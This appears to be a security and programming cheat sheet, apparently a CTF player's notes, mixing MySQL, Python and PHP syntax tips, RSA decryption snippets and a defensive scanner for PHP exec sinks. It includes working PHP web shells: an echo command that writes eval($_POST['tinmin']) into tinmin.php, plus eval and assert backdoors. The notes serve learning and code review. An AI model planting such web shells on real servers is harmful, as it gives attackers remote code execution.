linux

Some escaping

echo "<?php eval(\$_POST['tinmin']);?>" > tinmin.php

MYSQL5.7

Create a user

CREATE USER 'username'@'host' IDENTIFIED BY 'password';

Grant privileges

grant all privileges on mq.* to test@localhost identified by 'PASSWORD';

Drop a user

DROP USER 'USER'@'host';

Python and PHP: easily forgotten points

Python: check a data type with isinstance instead of type

isinstance([1,2,3,4],list)
#True

Python ternary operator

a = 3 if x < 0 else 6

If x is less than zero, a = 3; otherwise a = 6

PHP ternary operator

php > $x = 0;
php > $p= $x > 5 ? 5:4;
php > echo $p;
4

join: concatenating strings

>>> ''.join(['1','2','3'])  # list
123
>>> ''.join(('1','2','3','4')) # tuple
1234

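Cryptography: using RSA in Python

On Python 3, use pycryptodome in place of pycrypto

from Cryptodome.PublicKey import RSA  # the Cryptodome namespace is installed by the pycryptodomex package
# ------ read the public key ------
with open('./pub.key', "r") as f:
    key = RSA.import_key(f.read())  # import_key takes the key data, not the file object
    N = key.n
    e = key.e

# ------ build the private key ------
from Cryptodome.Cipher import PKCS1_v1_5
# d, p and q must already be known; d is usually an mpz and needs converting to int
prv = RSA.construct((N, e, int(d), p, q))
rsa = PKCS1_v1_5.new(prv)
# the ciphertext is usually hex-decoded before decrypting; the second argument is the sentinel returned on failure
rsa.decrypt(bytes.fromhex(cipher), None)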

Unsigned hex to ASCII

from Cryptodome.Util.number import long_to_bytes
flag = int(cipher,16)
m = pow(flag,d,N)
long_to_bytes(m)    # m has no 0x prefix

Format strings

PHP

<?php
$num = "1";
$str = "school";
echo sprintf("you are number %u in the %s",$num,$str);
?>

you are number 1 in the school

sprintf

%u unsigned decimal number
%s string
%c character for an ASCII code
%% percent sign
%e scientific notation
%f floating-point number

python

"My name is {}".format("tinmin")
"My name is {name}".format(name="tinmin")
"My name is {1}".format("tinmin","imtinmin") #My name is imtinmin

C

PHP code-execution functions

eval()

<?php
    eval($_POST['tinmin']);
?>

POST:
tinmin=phpinfo();

assert()

<?php
    assert($_POST['tinmin']);
?>

If the assert function fails, the code in the rest of the file stops executing

Command-execution functions

exec()

No output is echoed; echo is needed

<?php
    echo exec('ls');
?>

You can use exec('ls',$a[]); to write the execution result into the array a, then print it

passthru()

The command's output is echoed

<?php
    passthru('ls');
?>

Output is echoed; returns True on success and False on failure

shell_exec()
Equivalent to the backtick operator; no output is echoed
Example:

<?php
    echo `whoami`;
?>

system

<?php
    system('ls');
?>
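
From the defender's side, the functions listed above are the sinks a code review or web-root sweep looks for. The following is an added example, not code from the original post: it flags calls to these sinks in PHP source and rates them "high" when a request superglobal appears in the arguments. The names SINKS, call_args, scan and SAMPLE are assumptions of this example, and because it matches with regular expressions rather than parsing PHP, it also matches inside comments and strings.

```python
import re

# Sinks listed on this page: eval/assert run PHP code, the rest run shell commands.
SINKS = ("eval", "assert", "exec", "passthru", "shell_exec", "system")
# Request-controlled superglobals; one of these inside a sink's arguments is the red flag.
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b")
# Sink name followed by "(", not part of a longer name (curl_exec) or a method call.
CALL = re.compile(r"(?<![\w$>:])(" + "|".join(SINKS) + r")\s*\(", re.I)
BACKTICK = re.compile(r"`[^`]*`")  # the backtick operator behaves like shell_exec()

def call_args(src, start):
    """Return the text between the "(" at src[start] and its matching ")"."""
    depth, quote, i = 0, None, start
    while i < len(src):
        ch = src[i]
        if quote:                      # inside a string literal
            if ch == "\\":
                i += 1                 # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "()":
            depth += 1 if ch == "(" else -1
            if depth == 0:
                return src[start + 1:i]
        i += 1
    return src[start + 1:]             # unbalanced parentheses: take the rest

def scan(src):
    """Return sorted (line, sink, severity) findings for PHP source text."""
    hits = [(m.start(), m.group(1).lower(), call_args(src, m.end() - 1))
            for m in CALL.finditer(src)]
    hits += [(m.start(), "backtick", m.group()) for m in BACKTICK.finditer(src)]
    return sorted((src.count("\n", 0, pos) + 1, sink,
                   "high" if SUPERGLOBAL.search(arg) else "review")
                  for pos, sink, arg in hits)

# Constructed sample built from the snippets on this page, plus one benign call.
SAMPLE = r"""<?php
eval($_POST['tinmin']);
assert($_POST['tinmin']);
echo exec('ls');
echo `whoami`;
curl_exec($ch);
"""

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```
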

Start an HTTP server in the current directory

python2

py2 -m SimpleHTTPServer 1337

python3

py3 -m http.server 1337

php5.4+

php -S localhost:7777